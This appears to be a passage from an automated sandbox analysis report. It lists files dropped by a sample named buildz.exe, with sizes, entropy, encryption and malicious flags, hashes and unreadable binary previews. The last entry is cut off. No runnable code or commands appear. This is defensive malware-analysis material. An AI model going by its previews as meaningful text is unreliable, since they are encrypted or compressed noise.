                        Preview:var W^y.oecM|J......8..n.B.w....s..lY..60.."..O,..6.R....V.............d[..R..A..QKL.B.B]!..N.........)H..52.B..N....z......~....:.<.+*\a.8....~..fZ..+5w.qF2..z..<n......;*/S..&.w....&.).x....M.K..n-.D..M..G).r....S...O.....gB.......[..>...m..eg..Y.mf(.s..{.....C..UNl.l..v%..M.Fq...........;..c...?.........p........4f.T..J.2.ci...,W.!tu.J....'.?R...k....9..f...K..k./...&.&X..Q~.....'kFX.N.U.Y.....e~.,....2......=..G.C...i.`uu.[...e.....].h.1..9.E_.t.f...O.:..Li^....N.fX;O.. ..|..6...AID.%q.....%r.....-.e\C.u.1..tW......R}.#....L^...>`Bp.TJ/.'..kY.Y.....wRX.z.........-J.e.C-.....td2...$..b.\5..9T.....F....5&.C.X{...]......n.K.....).,)>...%.....=.2Ell......'.. ........<jaz.Z.....wL..h. 0".~..c..aUM.c......._'@.....@..O.E.v...=.L......[(?_.G,....b..|..R,k..G..{.#.t.....Eb.5.F....41.d.O..Fk.....OK]t.[H..e..96....ec....>.....N2..|....{..7.Q.....F..E..B..a3.N.....pF.......e9rP...Jf..C...H......J..y.......f...*.......&..5..z......5X.....o.cRV.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):45781
                        Entropy (8bit):7.996090965793246
                        Encrypted:true
                        SSDEEP:768:5DB36IiXAoUkrucNpxR0mFwsQoS4+u+Evi288Xe9zbV3F+v/g8n58RejqmAYrh56:nrZrUZxR0OT+uhq288CJoRnLj3AgjlDA
                        MD5:CDE1BE01166B7BD78942641BFA68CB0F
                        SHA1:C2EE49D8C8877AA51115A6055559E594610E3F56
                        SHA-256:904CBF24B38F6588A7A0DBD400C979868E181624FBD6A67C90833140996E6E71
                        SHA-512:01D46C345CBC7FF03DC131B2E59769A9D38A514ADD7AC0FB8177F590DBBEF1F1FA901DF957C15166B69FAF65EBFD5E9A296884775A95C36BA7BA537113941077
                        Malicious:true
                        Preview:var We..3....."d....'..SD/.e...t........".~v.H"....o.@K.H...b...BQ.J...F.]^.vdM1....D.2..O.y....v#.r+.q.....,)....go...]..J..$...M].......&.D.r...+n..c[.F..(j.}....].N.K..G..:..I..(or.v.......S......dU.&kmt.<.......w*...'.>.Y..y..2T'..,H[Z&.......EL4k...hp....;R...,..2.c.F...D..o...".ag..}...R...'...Sy.C.:..\.F.7......"....d...N.!WB.g....h!]uS.UO....m0...U.R..v!.....l...Q.PE..9....9.5P..D:.v..u.\....4.-...{.....a....<z..N...T..:......0/?..=.R......R..!...>.D.q..`...T.{.@....| V.........f-e..........J=.r..!Y.....g.5rl._9pra"W...L......6..1..>F...K.........Up.....>Z.4......m.......Z.}[...|....W.'..P*.F.otXZU.#...O.z2.S.......a%.XN&..8..Re>!..@.+r.u..Vp.B.}....r..EI...s.=.\...."-...cL.AT.V....a..`K...J.s%B.u...E.1HL@..7.XI.a..B.V..6p..q........#."...^...].....C..{u.?1.X..g...q^.=|.4|...R.......j.PL..A%..Bz..e|...a.4.+@.#=._.I.=...6.,!.......k...G..F....(.++ 5.z.T.4.0......R.D...@TdQ'..Ns.G...}{............GG/MDQ.|m........m..u?...-D...f
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):127792
                        Entropy (8bit):7.998558658672033
                        Encrypted:true
                        SSDEEP:3072:2vKR5P9hYTONKzkdIMDGOEcKchywueRHvg2KUSSRl1QlxA:2ibPngO8zkPGxcK1wueRvg7UnlQm
                        MD5:FA8B5AE124B67C30A979245901766871
                        SHA1:B4824A0FB26B1DFE14DAAE80EC19C907F0133EA5
                        SHA-256:692CAEB3992F4F01BC32817784B54649EF0A36B8637EC2E8B5B9B42379478E1C
                        SHA-512:861760A0F67E4FC04A3678C5AD6BD1B03472D0A194FEBAF01B8531E8AE999803738378AA18FABACB06ADCFE77D60699FDE031E9D7EF1834190443442577A5D7A
                        Malicious:true
                        Preview:(func...Cf....]..xh2......C(...u>.".......E..ZE....H@.g.1(n.@..*.....o9.s.T.=....<Lw..p.zdT. ..P.W5...K......M6.....O.....R.gyf.x.9.r6..%.|.U....$h.B..s.....C.....Q....B..Ms.........@.c..J.W.e.Wr.|V..... .N.^I..RmD..O.......[F..Z.....q.w~GL...z..k#<].<.N..Z{......7.k..:.|.....b....a..UQ3...V.+$d..N....<qX=.mg.........rL.].....e..9.=.m....?a'.+.....\...*..7.>...&.4).A_.......q&NM..A.n.a.....t.N<.@2Aj...r...s.&[....1iq..]....8..*.M.....M....n.;.$d,67..;.......F...*....K..D.=M.a@^..'..@z..{.I...QGe.U.7!O2#C.%o...*9...."..O...x..;.....\..z(.:.uCJdC..T..W..U...hA.&?;^H.....F,....`..p...?.....<....4y..7....T.H$s6.....s.....P.k.*.;K...>C.......4...&^G.......89..2..Z.UX.T...G.....w7....]...aV.l.F.3..}...@.J...H..[.$f.~....^Sa.5.....q."..7..v..;0}..C.Z.-^.U.........c...}..u.3.p~.3.0P~..A..a..#......^-b(.FoA.h...L.ad9,z...[..o.$P..M.g..4(C+.. ....'...l...B.\.....=R..y.?.....J.b..5....I...x[:.B...y~...yC......\.e.|....-$.....\xH.y....|[.n+R1Z......}.6..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2436
                        Entropy (8bit):7.920889950410088
                        Encrypted:false
                        SSDEEP:48:4eAkkOxzRidC+8P9xuPRUP/TVkNng9xqfpcO4ybR40I0iYGWrBuUD:XBzsCDP94MVkNg9xKuOvR40foA
                        MD5:CC0532D8402EDC0678F3275504F77525
                        SHA1:30B8766F2C258CEF8CDA69B5FFD755F45F3321E2
                        SHA-256:756C134F9323A520B769CCCF036600039A13CBA5947A50CFA7E16CE8F08490ED
                        SHA-512:4BF5D5F68543399BF63912F008B4E891C567BDBAFF890B78B5E9626CF8FD7F5CBBF4C8DE3C40B656BB13FFA7950881F7616CD621F5A29B53A700C61FBAF0A232
                        Malicious:false
                        Preview:var W.k.$..zP.`....."+.k9..6..G$=...aO..Hb^0..bL.E.{..r.. g.OkG..se_..&.0........G$S.....,..k..{.......R.y^l4.4EU*..}.aK...3.A....p.s..o..z....I...^....$)].0..V..V..........J..S..C...(w.}.......W.B.._DA.....&U4..1.'.....,=L...m..=..<5D....6.."d..q...A...yQ..T..{.l]=i.x.).N....].H1sU..pD.S....$8....Z^f.x.EN..i.`.<K....0.e+.)mWF...CX|..$...[.....X.R/ ..w...)...[A~#.9..f..Ze.B..%7...e._.u....`.....T.......IFS.CZx..y..l#.&C+..I.a..........'.b.C.......n.......t.....b.."=cA..#]..7.....u........D..|.... .N.Pn........k..p,=[....sNXH.9.H[.5.wid.E.;.....)...t.P.(............B..Q.J.*r.>...-.\...V.....H......^.!E0.BgM.Y.p..j..!...g...X^...p;.I.A.,6*q.B.^...a.....=9.5.....>.u...;yD/T..|..I.SAU.:\.......k.E...tFp.sz ..ofkL....\u.z......z.y...g......n...-|H.Xd..Z..A.]..i.l..A........[.Y^..h..vfd.s...>.|..L....5>..q.$..>.B...S.d...%....q..`.4....'.....^...d.OlV..[...... \#~..............f....3..3.y.`...\n=.8;JZ..X}.]x.}~.Y!.?DB..G...w.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16301
                        Entropy (8bit):7.989132250085129
                        Encrypted:false
                        SSDEEP:384:JSlKzOLDVD5EmJCeGqv9atzQFzgBLrlAx8pA:MEzO5aveDv9KGuA
                        MD5:81765B7F31DB95304F9AEAF7C2B48940
                        SHA1:8BA97045D84C7B8FB114A539A8F52BA3F20CC1F2
                        SHA-256:8758E944BE054C6F0F1977541CC72869628F9D3BEF0C96A4B8E5B104261C6BD0
                        SHA-512:A4972BAF5AE0DAB3E2877AF08FBCFD92483DC0BF80C28908B456F3E4AB08CB650EB0E3813A4B180AB7E2E448B6097835476388EC3598BC4D49B2EAD46F3FE8AA
                        Malicious:false
                        Preview:html{J...:,V....c.gq..P..:..y# 86D.....1.Qg.....N..../..0..E=.Z9...,.......{a*fp".{~xb.....`..U.`..H...W...z..dO..S|....UA.._.B..'.<..J."...x..4...(.nd..G.E?.FQ..A..4.^.z.e......@..t...^........=..@wr.z..K_........^.x.e.SE...L0|<.QKF.v...W...:..9.x`.C....'x..6.+F..6?V.......h(.[...Ua.W6.n..D2...N....>....\..%...l...p...l....D..."1.&..Q...u...g......^[.,..k.0qG.;Hmp.9..(_.4.g.sS....CE...Ao...b.(.~.....O......B.q{..@m>*..!<Gw}.A..........A....q.9....6.\YJ==..R.n.;..I.'....c.f...p....XM........./gKU.[wtk..j`.u.....}....\.|.H.:.H..n....._....s.9GS'.....4.=M.....nv...Q'..L#ZP..<.R9vV..T..m&..k..+{.W.....x..!`.|.\g.......o...~...tH.+.m..........a..~\.Z.`W+<.N....7.[..?.`v6~n.B.....$....sKzS....!CK>U.)j[....m.RA..$.Ss..+.....\.....b..Ng...m.n.E....N..l.s..O..5.....*ak....G.:.\...X.!.5..w..!X...X..z.`...&.Y.aN7m.D..8.T..z.d.....H.......(G.....as.H..g.c@Z...........c4.1.."9....S...e.!..N=...Z.-.PBf....G....&;.pI(./l.}.P+..Q;..*.5t.w..<Ir*...V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2444
                        Entropy (8bit):7.920754462711566
                        Encrypted:false
                        SSDEEP:48:SnA5kChxYtshkp2HhJyGBnBsfMyhLHVweO6eyhRdqbTgLsERtrHu8oNHKUD:eA+wAW22BJy0naR1HRJLsERxO8OKA
                        MD5:4C7BF8CC228C62D371A0A19539E0FAD3
                        SHA1:365E823B938A974EE36374AC4EBACBBA8C47CFEB
                        SHA-256:24C229262527870EBF8C615829468C70F195AED047D2BFB1092277CABD09983F
                        SHA-512:20CCDF6E372E1912042599CCECFA27F6F909915F9C4FDC6BCC093757BFBFB44886E2E160A191C7F7EAE1216694624AEC74FAC5DBBF3228BACFBE92A62EE1C6EA
                        Malicious:false
                        Preview:var W.-...j.;.Q...N@A.cs...F..v....i \....Y..\...c'2.Z...H..?...Q.U.*.7..../iU....WT.y.<$I.WdL ..8.h.]...m6ra^...|4.WP.`].yT...~=....)...I.....s....|z......1'.mt.B....+^V....-.x6..=Sn..{62v}..9..a....M..Y.....C...'...y.6;....lAd..Py.0eB.+./..8..../... ...N.4z.....*....U.8.#el...v2J....53y..2...dr..l3..V.,.G.....?.......N...._9J..cTL\Y.B.-..T...;.};...U../.-?.Eqb..Q.L.....!../`..8.).....S.A...._..U.7..=..E4....h...*....+.s>.._.,.LH.......+.[...U.HH..%.B.t.2/..d.Mx}....|.".".V.^.I.#......K`.2.d:...$xb....xHy.X.T...[...6...[W.2P........nHtN.I.."..'..z{..]..i............m.X.?;.Y\. ....../..Dn.4.....Z..j......f....z_..I.KZq.....=......N.BP...e.s.[.........A5.....ob...........H#q~..J..F....|e.$...-c.g...#....J.D......L...z..OS..QO..'U]6..!.L/]..'Jxj.6.o.sAa.2.k....Q.....F.h........b.%[.l.|..\@.....!Y.....IN3..Qh........i[....q.m.ILT...Z..0..+.o._.Kc..8....r..!...3...t/\....C..a....Fk..W.".c..h.96.~..V..J[......e..3G.v....K.yr...@.....;.v.....]
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):192924
                        Entropy (8bit):7.85865237970682
                        Encrypted:false
                        SSDEEP:3072:aO4Wyjtps5Apev9RCv3/RqhwIShS1BtTxOc+8G9opMxqR9JA2Zi5FUmrGb7ounUA:a7Pw5AYv9+RqRShS7tTAttomxw97jnJ
                        MD5:07493AA9FF47841A3298886F2CF9E776
                        SHA1:2A2D264ED66B8B396D02B0620DFEF958816F4A2E
                        SHA-256:34B142B4C650EE97215BC75591907253B017A5BDBA72EB926CE087D712A9C554
                        SHA-512:3B174FCEB9C8F971E6165F09430E26F170562AD56AEEB1AF5A57C42DEF3A313D21C9AF2D7BF8C7439717C7F64C980AAFB50DCD2F1D3BE77DBFF84D40C640DDC1
                        Malicious:false
                        Preview:var Wu^.~.c.~n.......U#.....Z.>..c..M.~.....Yh7..j.V.k.|.Y\\T.Al..1...y?..|Mu...!.Q..F`.....xC..v..z.d.....L.Y.._|Y.e......>.dH.......0.S'.h..g........6.E.w.3.....6fjz....Ma..&B..b..C..w..4.J.Sw.R..>|.?..z;Q....*..........a......../g...UO ....Z}U...<..n.......V.YV.w.#..*..)1/....C..1k.......-a.........z........i'.>FU.ej9..:..W.Q...QN6Y.....N.=-......K..|.0c...o`q&..T..J.-...(E.Mf..F.y...J...C..H..o4.)....gC ..d.N....Oxp...bY....z/=..44.....b,.@.r.q.M.!...b.@/...6^k.kOr..X.....G.A...Q..M.K..h.....K.o...V..8:.. Y........N.=Y;..r....Q.....).R..q".=.F.d...m.....=+-m..'=8.g'Y<.*P.wU\.......r.ZWs...w..{.^....5Z...O..:.k....M..f.....Sm..|......{.....$..(............>D...n2....g!..|....q....?..j...a.]........u..5..cD....%..."..L...../.!..|K.0.'a.dcE..........L...)..........z.....M...A..3).3......K.~...4.....N..n.\K..y.O...a*>-3..Y.gt..;.'o.."\.;.....{.i.....$...7%..S....!g..#.\...Y.....D..my82".._.. i,AI.o.=Z..-Jd.fw.]....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):131722
                        Entropy (8bit):7.998668107481475
                        Encrypted:true
                        SSDEEP:3072:6HFaAM3z/qpyZ79QYGLDW+2w+c6jaNJrph7qFTAQKyK5y5A:6laG49Q5Lt2w+T+nr7RQboF
                        MD5:6A1CC067D8F19C5E8A5484C6C4F53564
                        SHA1:95C105918A90ECBD541326B6F588C1BEF81557D8
                        SHA-256:7829C8FBBA3CBD21BC7009904F4A4EC47F5294AF51BF160ADD2DCEBCC3180F84
                        SHA-512:FCBCF62098F031D27BFE7A5D2F6976E462A38AC42F09D0DDEB589036B0DE55F51940786DC5A37A0CA6125DADBBE5F24334C2B72D107A7A250897063E53CF20EE
                        Malicious:true
                        Preview:/** @...n4u.Y.j-.....V+.U......M...J.6}..a..i.L.w.M..L...8.c.....Y..iy..o.._.X]......W......<%tiVZ.f..u0..7.....?.G..=N.^...1.......I...@.y..UW;.[h.......2.z8<.ETL.._..,.C....%Y8P.[.f....JK.(.~..C.G..5..\ .D.6.tQj.5..lY..)d....yd{.4..&...Y#.2..P.......7_...{...K..e.n..7.l.U...!.-d2................./.8.t..[.%.;<...<(w.(..uS.....l.T..........&..3..i+...'j.Q..Zrz.'..(j.*I..^.FU...M...(....F...J|....m.A.....H-....)g.C.E......Ds..,...]B.&.B......._S.L.P........y....*~.....c..q.B...V....+....8R.-R$.k.E...7...g.N.u../E.)?..#..IV..|@.xz.....g...|.?^.m..m......7Ox|...*"l.Nd......C.y...........m.p..K.d.{.@.....D.{.h...W.pln$0..d."~..o...F\ .....I\4..... ...../.;%...`C.V.>!)d..w..%..........Ss.Q...........-(G.../T.).K#.J...h.W.P|.D.a...O_o.L....@].....1..........g/......(..B........m.E.M.2..J...99.T=..a..@n./.{*......FI...z}...v.c.V.o[.JX.L.J ...?...@.....:.y..............a.+.-...UA.#..2.b.A.Pw....V.#.~.....Z..m.2.Q....l...t..@a..EV.*.^.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):428901
                        Entropy (8bit):7.027150840475615
                        Encrypted:false
                        SSDEEP:12288:BvqgQq5PwBX3rLZd+Cd9V9EeLp00HlmZoYh0yh881c:BWquBnrX+Cd9V9EeLp0WlmZoYh0yh88u
                        MD5:F5992884D713E619F2BC01F6C2A1AAD3
                        SHA1:4361205002BF5E09964CA27188CE844C89F5A40C
                        SHA-256:CD168D04DD6E10BC01300331B96A000DA27D3C24AB6BB7697E11FA39C04084A4
                        SHA-512:F074DC7135815825EEF3B0E7323A1A7B4BC9469EBAA1D82E49078DAE52659DA6F744F24DF8DD678B4F0C90E4C49C14F1A631FDC922C24DEAAAD322687111EA60
                        Malicious:false
                        Preview:.scop.*.r.....+o....I....C......<.....0......9.v....|"...TU.0.q...e.b.)1.....b~.A...f..!...}..~.y.?....-...?)$6z....qV...y-.*IM..w.....%O..H.'Zn..&..`.........]Z8.?an..S.O.._of\.......7..9..ch.\.A..W..`z?G...>.Jay....%%Y..B..U.5../].P...?.>......d.d...).0..=.@....4.'..p.V.*.. dY....L.s<.+...K%:."...<..._.i.m..K l......s1..=....5.-.r.9.p..Yq.:5......Z....6>9.....S.....hx.......{....B>L..6.._..~\.......Sq....\)......M!..G./,...1f..(!u..~`..IG.#.q.Ykw.u+*..........L..0_.*.UY.k...t^.0.hr........%..P.<..%L6. .'...H.B?q..R.S.-'...v.%%].."...............3..B#.....^..5nZ....X.0.....D.....f.?.w.}......fb.u..1oK...PD...I=.._.H.-..<N~.xnpDu."..@.: ..Q.....R..~.n[HL..u..O....+..j..Y...).....m...U.r.{...^.4Q..:...x"..O..R...I....;...:.{..T..m.....`]S*yq1 Js.r.V9.X|...m...HS."*..... ".).........T...O"..YB+.8.....D;..I?....2......L... n...~.............[?6%.b=#.....y.......Zw.Bq...y..`Pa..z..0.^....R.!!(....E..k...Z.~.,@.$..*.......G*'.N5t..;..5..O`...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17832
                        Entropy (8bit):7.986382148806747
                        Encrypted:false
                        SSDEEP:384:NmHhcJMK+iFIDoyBK2rhRqj9tP898RHhNKhzhj3wqU3A:QHoMKvFWoyBKiRoU98BgzhMqMA
                        MD5:D703D78E0B927DD259B06F63CC29B0DA
                        SHA1:12785D5FF4C6C59B90524407D31A7A0A40768FB9
                        SHA-256:AF8B5DD5C4EA77093D8A8663FFAEC3F9D6796F0B3168314C256EBD721650EDEE
                        SHA-512:77C1961EFBC357661F535C4BD7FFF230E2EC3463621D6D2383CB3AA06C293E0C9724395F8E3B2727D8027237ADB6C1095858FA548F0E711476E7D9F5904E617F
                        Malicious:false
                        Preview:!func.VV s+]...,p[n..m...;d..\......)...u.`.h.*_[...%..Ob...V.....m.H.....4...s..P.L)..M...q..i..0.}`E>..<e@.,.~....|..Q......I]i%)...9i.......J.6.......;5v.....Q....D.D.."M....y...;.....9..X.~.x.MWd...9c]..?^.l..Y{.z...E...p._.d.9....<:_.~....0..@..!..L?.w(.m.f9.z.n..".\.O.E>.H..IH..r}..{9q...v..&,|....<.%]h(.....L..q//W..........R....?\.p$.2..gO.|....e.....L....Z.......S....?-.3.Wj.~T~9..B....T.\.x)..l....N....O...t...-..!.8i...[...r...1....8.:.mA.>..=E.};.......#.R..@........c".....>..[U,.&....sj.V..Fh...Z....N.........3...*atCy.\.A;...J5.[...f..H?..#.......MU...U...\$.z..~w. ..s..7p`...w.......h.\:...W.}=l5....`H_..."2.x.8D.b.N.B...3...a..V...$.'y.}.w.O.pV...6W.....8..uJ(.....A........ ) ........JSB>.^.B.......3...g.Z..w.......W...F.X?....xgpn.'..E+..F)...{.@./D....6..I.i@..s.e.7..nH...J.`#(...]D.:.t.N..7.:H.....lw...xZV.]#....En...3....Lk..{..R=.XX.......c .vW.bb%nG.@...m...z6..`.q;....'q.tb..../....u.xk.u<<.7Zi .vc..T.^0.>u+...a
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):825
                        Entropy (8bit):7.759396204931197
                        Encrypted:false
                        SSDEEP:24:hGzAO0b46V6DR3YE2sj2W19vTbldHuQqYwFGbD:hJD4/DsnedblVuQlwFUD
                        MD5:44C00757F77BA932417F9B714B8C7CD8
                        SHA1:A9CFF046CEE82467DBE6EE7CB602EA1741401EDD
                        SHA-256:B76045540BF35AE951517F61B6263B451F5839AA65FF173DC814426D3B3E45CF
                        SHA-512:A18735BEC6A539CC312A163F804A081E8B86FDC016CEB26FD2042520343430B0791545B4EEA0CE3CA971336C5C90E2BA53BA548CCB9DF7CF9FECE94692FE7804
                        Malicious:false
                        Preview:var W...SZ..#k.$..Ga\.\0.}.>..........C...........d.&.R.....7.......8...lMC./..!.b.M.XV.}~..Z..v.).Do....]Y....(.|(3.E@_.......7......|R(s.6.#UAm.Q.D.'.....R..Z.....a.f.Zv{e.R.y.0Z@z.gj@.9F...X. .hB.....br._...W..vY.ZM.)...%...e;2+./9....V.*..)uF..7.p...G.......7&...-v.1.b.U.F....5...K.V.K.h......N8h...r..sA(.\X..Ws.Ha......k...J..._b.....ve6n.....:.....D..P..$^w`G.[t..cx.7..hx3...A..."...\W..z.[AY..7....^V.....m.]..a#...0/,..5.hS...=+.....6.....&t............s...&...f......L}T/H..U5!Q..a..<.....D.=k..Q.3..J...;E..a......|."6%.j.I.2 ..O0.|..TGT..C..{....{i...!.......Lr....5..]@..#.$K/ .~{j...>n&....D..e.T."4}.....n..1.....U.O.'./........Zv...$...p8.a...w.K(0..N...#..[...LP.[.....-...`..7.Vq..q.....6.mcgL..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):172352
                        Entropy (8bit):7.9491476254436675
                        Encrypted:false
                        SSDEEP:3072:IyOZO/Vn6sGDRt53ffHwYme3+vMoVqT8FV+bkuUTdZ28bA:+Q/nyttffHm4yVm8FQ
                        MD5:86D7BD426B039633EB7949D624372628
                        SHA1:ED76741F1EF2F6C46A1793952B36848BE5DD7FC3
                        SHA-256:952651F7C17F6C2DE50A87B4E0F17C8CD04A0DCA60E34E7865A717C8138097F7
                        SHA-512:997082B1868D0845BD59F6568ECCE0D008C7BB115121E7D180B04B4A1BDCD96CF9C45E6A597C56B7759D33D6CD3728E6144612DBCB872B94AC4C6B6D1775C26A
                        Malicious:false
                        Preview:"use .....t\26~x.l..u.TL$.H..z.....k....^..^.(..s+.x....f....P-.g..O.H.~.T.k9.\.#.j....P.5.....q.fc.|.D85.H.fg..3...U.h..y3l.VXP....*...so=@-U...<......#...0C}...f....~EP......l.G....&.d ...sW....q...*........\5'\...~._...*..)..RNeD..8....U..`l`\.....].."..!,._.....P@nM.{.~...f/.B.........#>.}A1FFLK.P.5..U..O..._.1<.........%...k.=.. ....=#>.p~3..r..J...>O.0.6..oy......V.yr.:5.dY...c.h..e..........z.yS..:.yp.*E.:...).;.....P............B..c.U..$A.|.'...7.)..Hrh....5 ..n..V...p..@..z....y.V..wxIA..?....2.....b.x.J.-......F...Y@.............O.fU-..s,1......O.".!.|.@E.?.MS[..hp.N>N..../..\L.NT........Op....F...Y....V.[W....-...T...<B.~..M..B..-...atK....v...a#.h..]U..f.&.v.:........Z.n...8.s.r1.xH..lc........-._\.e...4....].-..).h...89.L........{r..(-!.JV..&^(..n..=...6`..7..jn.....31!....y._.b1..?..e...n...:P*vK&....zs!..z2....=.!XT..Gc..A~1K.iOW.[....o..~./...j..v.T..HB.^t.Y}]..../9..v....EG....t.B../u..*..._...,.?.E..FTW.U.n.t.L...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39925
                        Entropy (8bit):7.995269588869529
                        Encrypted:true
                        SSDEEP:768:k5YtwbqfSgAV7CrpRw6MCSXPuFGXXsEZ8Z/LlFU9QLgBkKhcEolsXA:k6tS3gAURUkQ0/UaLScEzXA
                        MD5:4EC0F4255B34E62CEA5A72A55AAA45C7
                        SHA1:E1FC5C6B6795BFE194565423FACB5587A589F70B
                        SHA-256:903E0D1963D1D6DBE72814E58E26F2E2921C5BE96E78C60A29A5AEEF83170658
                        SHA-512:74A26290D08CE7C5569F86027EE00DB82CD8C9009F0C784D6F36EA9D42A2EA0AD87ECA39A2DCE8423601AD0E917BADE211A5F1EDEEC7D40DA6DBA2A63D7FFF0D
                        Malicious:true
                        Preview:var WgC.W....h....c.q..3.....:.Gzf...z....<D.J)C43....8zwD......TrF..OJe.......8..._.....#'5......L...KC,.....D.......k...*..._....F..........?1N#E?>....d.>&...qN.?)9..j>..7f..7..C'c+.b.. .s..x....pV......6+.J.r..bT......[].J.E.Y..R.R$.o....Ff..f@-....l!~nC$.c.:.W5..j..[...jps^._.^.q-..S.i..`k..v...mS.(.c...x[].[.Y_.cF.pi...&...U..m+.$...L..]z. ....D......:.....k.....9.w..]...q.p<L....$sW9.....Q.....Y;^.D..>2..f.B..<..F9|.}..Z.....".V.~i^.!..&..^Q..e.x........)q.K..$..R.lh..x.....n../.;+/0.*.N...xi...w%<.X.&|.%...6E8g....=.k..F9...g^.D._...3n`.. .[..^h....#=...3..;.-sd...f..2C.C.uWY.Y..0.7.#E5{Kx..b..!.Y../....[."=.|....Q.C.[...I.2..w.E..CG....\...%..A.xN.q.(.)...js..e^+7.yY.C.;.^.n:...%F.|4...R..r.eN!....no....a?D.......r..h......M.&..X.'L..._..-.F.-..]..-,..91.L.(4.F?C.j..H..[%..Ji...!...4.q`'#.?<T ...y..Tn/..k.h......I=.....0.....0..=Ioi^.....5y..rV...c.....cr!L.T...Og9s.zl.&..?5.7...B.^..D.lkkz..c6..._..L.........*.Ot...j...>Wt!|UJ.T.Hv
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1749961
                        Entropy (8bit):6.574775489950246
                        Encrypted:false
                        SSDEEP:49152:koysfSUX/CjrjYz6J9dDpwBcOTvz2EsoTE+rQU03GQr:ko9YDuBcGjS
                        MD5:C1DF4E06EBC229914E01BEA44F6BAED1
                        SHA1:63E7FD981A41957CE79BF86536F0BC59336C9403
                        SHA-256:4C2787D727985A94B14EA55C05B2E36086675ED821BE1D322225BADDA6D460B9
                        SHA-512:ED44EE9740A54E569E24CBDA80B37827DE5E6B3FF3E9BD208D762EF7CF5999BD1BA0A005279C93E2E8305F99F5D2359EB0E16A40DFCB7C3B66E69DE80E9E1960
                        Malicious:false
                        Preview:(func79..8.F...\b....5....<<!".Yi.W.+.>.._0"....D[\F.E.......[.....q.......?7gW......(.a.A...n.4.lVE6D.ca.........e%....e...pR.b"..E......^.n.-..Yj..@....w0.'H5..v.._.r..d...?...P`.[.h.....,.d.2..../...........3..%.$.....z.>KRSJ...A..<+Y... .w|...'y...6...Z~...b.a.e.>.U.."......~..[/S...lr.Z....z.&......X.jJP=.IN".1.e......y..9T..>......,g.Az/,....m.tm..?^..x..U.B...t............V.{.(/.....'...!.%x$....4..T....]....=......]....Zu...Bd.. ..y.o.{.:.ej},..l.=.L/_..O.Z.v....TZ.T.b/...].....D....:.0...w!...G\..W.h.........K.a.G.A.A....mF. ...7...Um.iR.......z&..V]..f.G"w..5x[JJ... ..F......|O......._.PBm:...P.=%X....a.ys.....L...2\w...N.9S...KGm.o[`....)a..T.`4..#C.4%S9EB..P......z.|k.>te4.7I..oOX..Z^gt..j.-J}R/c.....rZ6..M.G.....j......7).QC\<...)L).......\........^f]M&.nW].E..n...kF..........L....W.Z.....b.......$....%;.VTL.%......1.O.....aHj:...l...6..[..YZ2svBr...k....@..uC..P.l.yl.....M....siOd..!.....p.{....V..........Y....V/Vm,.T.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):467497
                        Entropy (8bit):6.283008578235236
                        Encrypted:false
                        SSDEEP:3072:staiiWM4Em3LhM+lcxUjal6a7oF8yjpy2M7w8d4gt/xyBw7KLwDM/I5JxZi2A:stdvM41hR82M7w8egRbMwDMwJrif
                        MD5:3A431758264331815F9D53A120ABD224
                        SHA1:C5FB8968F55B39079024E87098961636D7579DA3
                        SHA-256:D256D8C12B509313C8051521F81437DB0A1ACC4B659AFC6D28E5A26377733322
                        SHA-512:7F3830AED1476238D64112435341168EE1A896D99475D9FD584FF0941FEA72F5FDDE8893FE6D97D56A32220DB4B76B3C9495E01F84057F2E19D9ED5CCC654B8B
                        Malicious:false
                        Preview:var W.{..a.l....8K..e.'.J..7....R?.m...!.J..c..fg.....7.y...&.....A.{..enIC.......1a...s...J..a.b...V....X.8.3.Rm,..r..|.Z.3..O;.h...p.4.~...o.y.....0.S.)..g.......-....x}|.]....v..y....7..Jg7...8....,.%.5.....v.xiZ..$.!Gr....i..T.....'.#V.7J...Y{W..D\."U.|5.5...^..s..(...9w.():......{..L....E.bV.........(.....Y.....[.W$*.q.. .$A..B:4...<$V..'{..C...~8...z-.IS.y..W.I...dK. .Go.)(L.%.KN.{!.P3.K.),..f5Ty.q..V..S....)..1.(WJGPM.. .......*j.*C6.....+.2.R....>I.....O.j]..A..F$..O.G~wNz.5...{=,.:$(Q..........#~c.."....4..}.t.........0f.jA.z.2..hr........'xA.P.mf..........;..[.j...^9k...!a..Tj...j..jl..n@.t.G*o....._..zh........z=......F.^3)m....7>..C(Sa.%.5}.%...,.sww4z3.&vO.ms}...NQ..ys...C...<t....6J..[]..C..[m.C......X C..)Hf.+. ...7..<0R.....t.....O!..j...<.:m..=W.4.........=U..Z..S..26.N..!..._..'.j .])...=....P..p;.Rn .p...*#..'.\.....{.5.....b.0.>.......!.j..P...`|(....dv.........Yw..>..+.+sI..<.6[2G..A..-..-....2u.......Yd...?:L..(jY9.L2.M.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):9214
                        Entropy (8bit):7.982925935735615
                        Encrypted:false
                        SSDEEP:192:2NpW2yBrO0oe4cj4Jm7l/SA7rwjNuTIv0Ke5c+pXQQr02/wafF7yA:2mrRQcjrl/b68ZXZzIafFmA
                        MD5:365D9D2FB198B6D95DFCEEAD1AF313AC
                        SHA1:23879ABED44B543B8B1725636A2150FD06F64CCD
